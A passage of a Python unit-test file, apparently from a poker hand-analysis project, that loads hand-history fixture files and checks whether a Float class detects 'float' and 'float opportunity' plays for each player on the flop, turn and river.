strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBCF__T__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(True, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBCF__T__XBF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(True, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBCF__T__XBRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(True, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBFC__T__XX__R__BRF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(True, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBFC__T__XX__R__XBRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(True, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBFC__T__XX__R__BF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(True, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBFC__T__XX__R__XBF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(True, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBCF__T__XX__R__XBF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(True, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBCF__T__XX__R__XBRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(True, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBCF__T__XX__R__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(True, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__XBC__T__XX__R__XBC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(True, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__XBC__T__XX__R__BRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(True, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__XBC__T__XBC__R__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
def test_float(self):
# folder where are correct anserws
folder = f + '/testy/rece/'
file = 'in0gr2r__F__BC__T__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
file = 'in0gr2r__F__BC__T__XBC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__BC__T__XBC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(True, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__BC__T__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__BC__T__BRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__BC__T__BF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__BCC__T__XXX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__BCC__T__XXBFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__BCF__T__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__BCF__T__XBC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(True, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__BCF__T__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__BCF__T__XBRF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBCC__T__XXX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBCF__T__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBCF__T__XBF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(True, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBCF__T__XBRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(True, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBFC__T__XX__R__BRF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(True, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBFC__T__XX__R__XBRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float(), msg=file + ' ' + strt + ' ' + plr)
